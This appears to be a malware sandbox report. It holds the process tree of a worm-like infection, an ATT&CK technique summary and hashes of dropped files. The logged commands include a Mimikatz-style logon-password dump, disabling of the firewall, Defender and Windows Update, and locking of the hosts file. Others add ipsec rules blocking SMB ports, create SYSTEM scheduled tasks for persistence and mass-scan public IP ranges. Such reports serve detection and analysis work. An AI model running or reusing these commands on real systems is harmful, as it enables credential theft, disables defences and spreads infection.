C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3004
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2620
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2648
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1300
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\fvaftrpep\fiasmtlvz\wpcap.exe /S2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\fvaftrpep\fiasmtlvz\wpcap.exeC:\Windows\fvaftrpep\fiasmtlvz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
PID:1656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1964
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1884
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
PID:2988 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2940
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1436
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2200 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:448
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:3020
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3032 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1892
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\fvaftrpep\fiasmtlvz\eizbestpy.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\fvaftrpep\fiasmtlvz\Scant.txt2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1612 -
C:\Windows\fvaftrpep\fiasmtlvz\eizbestpy.exeC:\Windows\fvaftrpep\fiasmtlvz\eizbestpy.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\fvaftrpep\fiasmtlvz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\fvaftrpep\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\fvaftrpep\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2292 -
C:\Windows\fvaftrpep\Corporate\vfshost.exeC:\Windows\fvaftrpep\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "brzfpfljn" /ru system /tr "cmd /c C:\Windows\ime\iyapfhp.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2476 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "brzfpfljn" /ru system /tr "cmd /c C:\Windows\ime\iyapfhp.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2536
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fiapulrlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kiprrupu\iyapfhp.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "fiapulrlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kiprrupu\iyapfhp.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "utllzrqfy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ieszltnbu\yetdzn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "utllzrqfy" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ieszltnbu\yetdzn.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2384
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1648
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2324
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2808
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2844
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2704
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2620
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2648
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1880
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2680
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1628
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
PID:1760 -
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:2172 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:2232
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:2936
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2944
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:2052 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:2304 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:964
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:3064 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
PID:2980 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2364
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
PID:1336 -
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:1332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
PID:1380
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:664 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2252
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2200 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2836 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1788 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1632
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1544
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 676 C:\Windows\TEMP\fvaftrpep\676.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 1116 C:\Windows\TEMP\fvaftrpep\1116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 1172 C:\Windows\TEMP\fvaftrpep\1172.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 1368 C:\Windows\TEMP\fvaftrpep\1368.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1876
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 1580 C:\Windows\TEMP\fvaftrpep\1580.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 292 C:\Windows\TEMP\fvaftrpep\292.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 2116 C:\Windows\TEMP\fvaftrpep\2116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
C:\Windows\TEMP\fvaftrpep\bieqttlep.exeC:\Windows\TEMP\fvaftrpep\bieqttlep.exe -accepteula -mp 1344 C:\Windows\TEMP\fvaftrpep\1344.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:604
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\fvaftrpep\fiasmtlvz\scan.bat2⤵
- Loads dropped DLL
PID:624 -
C:\Windows\fvaftrpep\fiasmtlvz\yznluuqri.exeyznluuqri.exe TCP 194.110.0.1 194.110.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3032
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
C:\Windows\SysWOW64\dqljao.exeC:\Windows\SysWOW64\dqljao.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2868
-
C:\Windows\system32\taskeng.exetaskeng.exe {96695A2E-7C21-45C5-9CB9-1E3552DC8196} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1964
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ieszltnbu\yetdzn.exe /p everyone:F2⤵PID:2880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2940
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ieszltnbu\yetdzn.exe /p everyone:F3⤵PID:1760
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kiprrupu\iyapfhp.exe /p everyone:F2⤵PID:1884
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1816
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kiprrupu\iyapfhp.exe /p everyone:F3⤵PID:2848
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iyapfhp.exe2⤵PID:1560
-
C:\Windows\ime\iyapfhp.exeC:\Windows\ime\iyapfhp.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2932
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\ieszltnbu\yetdzn.exe /p everyone:F2⤵PID:3740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2248
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\ieszltnbu\yetdzn.exe /p everyone:F3⤵PID:2832
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kiprrupu\iyapfhp.exe /p everyone:F2⤵PID:4084
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3232
-
-
C:\Windows\system32\cacls.execacls C:\Windows\kiprrupu\iyapfhp.exe /p everyone:F3⤵PID:1484
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\iyapfhp.exe2⤵PID:2736
-
C:\Windows\ime\iyapfhp.exeC:\Windows\ime\iyapfhp.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:3764
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
1.4MB
MD57edd7d9e99384f26f0d39b347969d5e9
SHA14d14d2ad356307692a89171b04f57be4abaef405
SHA256d7d9f179c405908fb3aaa2c3683912db91464627794a294d2082c15a393bcfa5
SHA5126419110ec846f21c412b69818dec1a61fdee0653a3b81caa86870154f94ce9760b7c80d5de32c29da7abfcff66bfedfb3a53b8ea0d27bcd8e9d79f9cf8d123ae
-
Filesize
1.3MB
MD545b08da1a499d56bc41c6d969961311a
SHA10673be12deaaca68a1b32fa9ea9ba75175d9b908
SHA256fcb267a2d9c768dcf3e008a8f524d1559506ded5d4dcd36c2caf5d7ef35cae5d
SHA512bdc9ee2138d05701292e3862e007b87417690f15bfcef0ee0f6a303f2029938411b6770d04a4e4c0794f92a3bafa7ebce9e907d76653e2823300bf42c04c371c
-
Filesize
851KB
MD56d3174e7cb0b4062568fb5fb6140d685
SHA123db74c3bdad2f3b83d2ec8062fc9a84cb13087a
SHA2569b710eba5dd8005f7568d0d5d9574266df08ad97ff49ad789f4f22098f96ee46
SHA512b120a6387b4da2f038cab40166224348cc27d5f0716aa58ce373d69e9744ccb3075435832430b4336522cf846cd991f31a145d9fad360c6c9c0c501ae9dc5bf4
-
Filesize
5.1MB
MD5b05da7facdaad48024c97939e63f140b
SHA1fb74c7bac416c7a126eb0ea3704da532d52dca63
SHA25670f7422acef558e99a7f3c58fb580c58698e1fa7582be6fc2355c9282fd0b2fd
SHA5127f043a6c54333d075bb788840c4c302ba190683beb278637f2a2863167c3d956d06c5ff14d52d44d5ef172a56a1a96879d81cafa322ee0dabbd16610cacfe2d8
-
Filesize
4.0MB
MD5603fbff395390e482a88bdf7f7419c8e
SHA19120a934ed87bd7266a64d88202eb331e03a9cc0
SHA256e9fb6140f151aa2eb5d8ba7f2a79f168ed7f7de800fe80bf9e381da49d81bfc9
SHA5121d41f0044e9625673878b6323212bd46fef1e10301be6055896f9bee8da5a01cf78e9dd45c3f3f6edb9b7a291fc6f919098edf5b802235eeb63603d67da41e65
-
Filesize
6.4MB
MD5d61c3e01d22bfd058c8405028198f9b3
SHA1b70f99ff78b5db7ff8deb3093b21e306f561dc85
SHA256e84860682fd01a2a3c9fa1099f69025bac334aed2a99043266c6a845317e4d7e
SHA5128f7e00dd49dfc9c030dc3a390855ac0f530a89dd0ba3443ba466701599c12bd6373ea1fba138b6c947663052d4ee4fc48483902f7a3fd98e2276e494060f9474
-
Filesize
2.1MB
MD5c81d0b0a80f6e729eb27693d10676547
SHA1dec834c41b29fa4b66787fe34647d553f0ca17c3
SHA2567c19db3838191e7dfa1e4bdbbe427ddab7115433aa6e857b98c144a5d1d7aeb5
SHA512905afdcbd642f59637107681cd9ffd2eb4ed782b7ed8b08aa955b7778cf637717e3a8b2fd01a185f7794ca07f6c925c0eb49941dc04acd1dbcf151ccdc5f668f
-
Filesize
4.6MB
MD5fa1ba4fae2d2c6fee8974e5aa048cafb
SHA15f9b5097517b2d08e63ec9617789064e5ca6e744
SHA25638b062acd0f1f5cd4858f47dfad3f0ef6ad5816dab1c87098d9520562e197f8e
SHA512b20a90abcc0ddd2a36466ef28f051eb5ef7f338d9e6fcf9c7cd702405c64613bac3db6bed7e0c64518a5006f3d4e31dc91c61a3ea8cbfc0025024fdd10abbd88
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
189B
MD5b0ea23f3468c4b496364cdd33e5bccd4
SHA1b363794d8114719cbc6749e184efbd0c9053fa36
SHA256cb16675ff2194db89b30b2c142f14a81bbb6cf591a703c36d7cabbbb18346565
SHA512fdd6acccd8ec6aabcddadab136ee900d075f417d7c3ef357d64451181fb070f79d576547aa535e3121d845d37da8dabcbea2b7727d89753929284d28a38ddc11
-
Filesize
159B
MD5fc67db2ef6963521371c3a5363c199e3
SHA13bc286b707807937a6384208c4146e392fe5cdd8
SHA256a4f9883db48cc9dc8a14653d7866b935f5f29f4d69bb37054237dbb7d80fb36d
SHA512ac38fc08b5f0257bd5040f1cfd16be8622cb4970e3d6df24dd9b58fb3449945fe84a6c960d35c55b9b0ad5457558cf9cea3f5fb8533c4f93927e43542a8d835d
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
SHA5124e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
8.7MB
MD55002cda27e463396a96807a09e356dd7
SHA16af2ef48c3e223f009030745335fbb3ec48caf59
SHA25666f4976363a884b4f82c8d1705ae73653d0d1c52a4ba74fdf529d8df88f96cdb
SHA5125b9ad178bc70290e3c26639e20cc70b569d1e9d7e8907b6f9be26f2175153fe9c8110951c007729a9be148d9702db5ba5659c5c75740ae24bb823b9a900092df